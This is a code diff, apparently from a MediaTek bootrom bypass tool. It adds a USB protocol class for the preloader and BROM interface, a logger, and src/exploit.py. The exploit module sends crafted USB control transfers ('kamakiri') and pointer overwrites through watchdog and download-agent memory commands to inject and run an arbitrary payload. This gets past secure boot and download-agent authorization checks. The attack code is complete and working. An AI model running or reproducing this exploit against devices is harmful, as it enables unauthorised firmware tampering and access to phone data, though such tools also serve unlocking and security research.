+            self.udev = usb.core.find(idVendor=int(VID, 16), backend=self.backend)
+            while self.udev:
+                time.sleep(0.25)
+                self.udev = usb.core.find(idVendor=int(VID, 16), backend=self.backend)
+        self.udev = None
+        while not self.udev:
+            self.udev = usb.core.find(idVendor=int(VID, 16), backend=self.backend)
+            if self.udev:
+                break
+            time.sleep(0.25)
+        log("Found device = {0:04x}:{1:04x}".format(self.udev.idVendor, self.udev.idProduct))
+        self.dev = self
+        try:
+            if self.udev.is_kernel_driver_active(0):
+                self.udev.detach_kernel_driver(0)
+            if self.udev.is_kernel_driver_active(1):
+                self.udev.detach_kernel_driver(1)
+        except (NotImplementedError, usb.core.USBError):
+            pass
+        try:
+            self.configuration = self.udev.get_active_configuration()
+        except (usb.core.USBError, NotImplementedError) as e:
+            if type(e) is usb.core.USBError and e.errno == 13 or type(e) is NotImplementedError:
+                log("Failed to enable libusb1, is UsbDk installed?")
+                log("Falling back to libusb0 (kamakiri only)")
+                self.backend = usb.backend.libusb0.get_backend()
+                self.udev = usb.core.find(idVendor=int(VID, 16), backend=self.backend)
+                self.libusb0 = True
+            try:
+                self.udev.set_configuration()
+            except AttributeError:
+                log("Failed to enable libusb0")
+                exit(1)
+        if self.udev.idProduct != int(PID, 16):
+            self.preloader = True
+        else:
+            try:
+                self.udev.set_configuration(1)
+                usb.util.claim_interface(self.udev, 0)
+                usb.util.claim_interface(self.udev, 1)
+            except usb.core.USBError:
+                pass
+        cdc_if = usb.util.find_descriptor(self.udev.get_active_configuration(), bInterfaceClass=0xA)
+        self.ep_in = usb.util.find_descriptor(cdc_if, custom_match=lambda x: usb.util.endpoint_direction(x.bEndpointAddress) == usb.util.ENDPOINT_IN)
+        self.ep_out = usb.util.find_descriptor(cdc_if, custom_match=lambda x: usb.util.endpoint_direction(x.bEndpointAddress) == usb.util.ENDPOINT_OUT)
+        try:
+            self.udev.ctrl_transfer(0x21, 0x20, 0, 0, array.array('B', to_bytes(BAUD, 4 , '<') + b"\x00\x00\x08"))
+        except usb.core.USBError:
+            pass
+        return self
+    @staticmethod
+    def check(test, gold):
+        if test != gold:
+            if type(test) == bytes:
+                test = "0x" + test.hex()
+            else:
+                test = hex(test)
+            if type(gold) == bytes:
+                gold = "0x" + gold.hex()
+            else:
+                gold = hex(gold)
+            raise RuntimeError("Unexpected output, expected {} got {}".format(gold, test))
+    def close(self):
+        self.dev = None
+        self.rxbuffer = array.array('B')
+        try:
+            usb.util.release_interface(self.udev, 0)
+            usb.util.release_interface(self.udev, 1)
+        except Exception:
+            pass
+        if not self.usbdk:
+            try:
+                self.udev.reset()
+            except Exception:
+                pass
+        try:
+            self.udev.attach_kernel_driver(0)
+        except Exception:
+            pass
+        try:
+            self.udev.attach_kernel_driver(1)
+        except Exception:
+            pass
+        if not self.usbdk:
+            try:
+                usb.util.dispose_resources(self.udev)
+            except Exception:
+                pass
+        self.udev = None
+        time.sleep(1)
+    def handshake(self):
+        sequence = b"\xA0\x0A\x50\x05"
+        i = 0
+        while i < len(sequence):
+            self.write(sequence[i])
+            reply = self.read(1)
+            if reply and reply[0] == ~sequence[i] & 0xFF:
+                i += 1
+            else:
+                i = 0
+    def echo(self, words, size=1):
+        self.write(words, size)
+        self.check(from_bytes(self.read(size), size), words)
+    def read(self, size=1):
+        offset = 0
+        data = b""
+        while len(self.rxbuffer) < size:
+            try:
+                self.rxbuffer.extend(self.ep_in.read(self.ep_in.wMaxPacketSize, self.timeout * 1000))
+            except usb.core.USBError as e:
+                if e.errno == 110:
+                    self.udev.reset()
+                break
+        if size <= len(self.rxbuffer):
+            result = self.rxbuffer[:size]
+            self.rxbuffer = self.rxbuffer[size:]
+        else:
+            result = self.rxbuffer
+            self.rxbuffer = array.array('B')
+        return bytes(result)
+    def read32(self, addr, size=1):
+        result = []
+        self.echo(0xD1)
+        self.echo(addr, 4)
+        self.echo(size, 4)
+        status = self.dev.read(2)
+        if from_bytes(status, 2) > 0xff:
+            raise RuntimeError("status is {}".format(status.hex()))
+        for _ in range(size):
+            data = from_bytes(self.dev.read(4), 4)
+            result.append(data)
+        status = self.dev.read(2)
+        if from_bytes(status, 2) > 0xff:
+            raise RuntimeError("status is {}".format(status.hex()))
+        # support scalar
+        if len(result) == 1:
+            return result[0]
+        else:
+            return result
+    def write(self, data, size=1):
+        if type(data) != bytes:
+            data = to_bytes(data, size)
+        offset = 0
+        while offset < len(data):
+            self.ep_out.write(data[offset:][:self.ep_out.wMaxPacketSize if len(data) - offset > self.ep_out.wMaxPacketSize else len(data) - offset], self.timeout * 1000)
+            offset += self.ep_out.wMaxPacketSize
+    def write32(self, addr, words, check_status=True):
+        # support scalar
+        if not isinstance(words, list):
+            words = [words]
+        self.echo(0xD4)
+        self.echo(addr, 4)
+        self.echo(len(words), 4)
+        self.check(self.dev.read(2), to_bytes(1, 2))  # arg check
+        for word in words:
+            self.echo(word, 4)
+        if check_status:
+            self.check(self.dev.read(2), to_bytes(1, 2))  # status
+    def get_target_config(self):
+        self.echo(0xD8)
+        target_config = self.dev.read(4)
+        status = self.dev.read(2)
+        if from_bytes(status, 2) != 0:
+            raise RuntimeError("status is {}".format(status.hex()))
+        target_config = from_bytes(target_config, 4)
+        secure_boot = target_config & 1
+        serial_link_authorization = target_config & 2
+        download_agent_authorization = target_config & 4
+        # noinspection PyCallByClass
+        return bool(secure_boot), bool(serial_link_authorization), bool(download_agent_authorization)
+    def get_hw_code(self):
+        self.echo(0xFD)
+        hw_code = self.dev.read(2)
+        status = self.dev.read(2)
+        if from_bytes(status, 2) != 0:
+            raise RuntimeError("status is {}".format(status.hex()))
+        return from_bytes(hw_code, 2)
+    def get_hw_dict(self):
+        self.echo(0xFC)
+        hw_sub_code = self.dev.read(2)
+        hw_ver = self.dev.read(2)
+        sw_ver = self.dev.read(2)
+        status = self.dev.read(2)
+        if from_bytes(status, 2) != 0:
+            raise RuntimeError("status is {}".format(status.hex()))
+        return from_bytes(hw_sub_code, 2), from_bytes(hw_ver, 2), from_bytes(sw_ver, 2)
+    def send_da(self, da_address, da_len, sig_len, da):
+        self.echo(0xD7)
+        self.echo(da_address, 4)
+        self.echo(da_len, 4)
+        self.echo(sig_len, 4)
+        status = self.dev.read(2)
+        if from_bytes(status, 2) != 0:
+            raise RuntimeError("status is {}".format(status.hex()))
+        self.dev.write(da)
+        checksum = self.dev.read(2)
+        status = self.dev.read(2)
+        if from_bytes(status, 2) != 0:
+            raise RuntimeError("status is {}".format(status.hex()))
+        return from_bytes(checksum, 2)
+    def jump_da(self, da_address):
+        self.echo(0xD5)
+        self.echo(da_address, 4)
+        status = self.dev.read(2)
+        if from_bytes(status, 2) != 0:
+            raise RuntimeError("status is {}".format(status.hex()))
+    def cmd_da(self, direction, offset, length, data=None, check_status = True):
+        self.echo(0xDA)
+        self.echo(direction, 4)
+        self.echo(offset, 4)
+        self.echo(length, 4)
+        status = self.dev.read(2)
+        if from_bytes(status, 2) != 0:
+            raise RuntimeError("status is {}".format(status.hex()))
+        if (direction & 1) == 1:
+            self.dev.write(data)
+        else:
+            data = self.dev.read(length)
+        if check_status:
+            status = self.dev.read(2)
+            if from_bytes(status, 2) != 0:
+                raise RuntimeError("status is {}".format(status.hex()))
+        return data

src/exploit.py ADDED Viewed

	@@ -0,0 +1,97 @@

+from src.common import to_bytes, from_bytes
+from src.logger import log
+import usb
+import array
+def exploit(device, config, payload, arguments):
+    def da_read(address, length, check_result = True):
+        return da_read_write(0, address, length, None, check_result)
+    def da_write(address, length, data, check_result = True):
+        return da_read_write(1, address, length, data, check_result)
+    def da_read_write(direction, address, length, data = None, check_result = True):
+            try:
+                device.cmd_da(0,0,1)
+                device.read32(addr)
+            except:
+                pass
+            for i in range(3):
+                udev.ctrl_transfer(0x21, 0x20, 0, 0, linecode + array.array('B', to_bytes(config.ptr_da + 8 - 3 + i, 4, '<')))
+                udev.ctrl_transfer(0x80, 0x6, 0x0200, 0, 9)
+            if address < 0x40:
+                for i in range(4):
+                    udev.ctrl_transfer(0x21, 0x20, 0, 0, linecode + array.array('B', to_bytes(config.ptr_da - 6 + (4 - i), 4, '<')))
+                    udev.ctrl_transfer(0x80, 0x6, 0x0200, 0, 9)
+                return device.cmd_da(direction, address, length, data, check_result)
+            else:
+                for i in range(3):
+                    udev.ctrl_transfer(0x21, 0x20, 0, 0, linecode + array.array('B', to_bytes(config.ptr_da - 5 + (3 - i), 4, '<')))
+                    udev.ctrl_transfer(0x80, 0x6, 0x0200, 0, 9)
+                return device.cmd_da(direction, address - 0x40, length, data, check_result)
+    addr = config.watchdog_address + 0x50
+    if not config.ptr_usbdl or arguments.kamakiri:
+        log("Using kamakiri")
+        device.write32(addr, from_bytes(to_bytes(config.payload_address, 4), 4, '<'))
+        if config.var_0:
+            readl = config.var_0 + 0x4
+            device.read32(addr - config.var_0, readl // 4)
+        else:
+            cnt = 15
+            for i in range(cnt):
+                device.read32(addr - (cnt - i) * 4, cnt - i + 1)
+        device.echo(0xE0)
+        device.echo(len(payload), 4)
+        status = device.read(2)
+        if from_bytes(status, 2) != 0:
+            raise RuntimeError("status is {}".format(status.hex()))
+        device.write(payload)
+        # clear 4 bytes
+        device.read(4)
+    udev = device.udev
+    try:
+        if not config.ptr_usbdl or arguments.kamakiri:
+            try:
+                # noinspection PyProtectedMember
+                udev._ctx.managed_claim_interface = lambda *args, **kwargs: None
+            except AttributeError as e:
+                raise RuntimeError("libusb is not installed for port {}".format(device.dev.port)) from e
+            udev.ctrl_transfer(0xA1, 0, 0, config.var_1, 0)
+        else:
+            linecode = udev.ctrl_transfer(0xA1, 0x21, 0, 0, 7) + array.array('B', [0])
+            ptr_send = from_bytes(da_read(config.ptr_usbdl, 4), 4, '<') + 8;
+            da_write(config.payload_address, len(payload), payload)
+            da_write(ptr_send, 4, to_bytes(config.payload_address, 4, '<'), False)
+    except usb.core.USBError as e:
+        print(e)
+    # We don't need to wait long, if we succeeded
+    # noinspection PyBroadException
+    try:
+        device.dev.timeout = 1
+    except Exception:
+        pass
+    try:
+        pattern = device.read(4)
+    except usb.core.USBError as e:
+        print(e)
+        return False
+    return pattern

src/logger.py ADDED Viewed

	@@ -0,0 +1,9 @@

+import datetime
+def log(string):
+    line = "[{}] {}".format(datetime.datetime.now(), string)
+    print(line)
+    with open("bypass_utility.log", "a") as out:
+        out.write(line + "\n")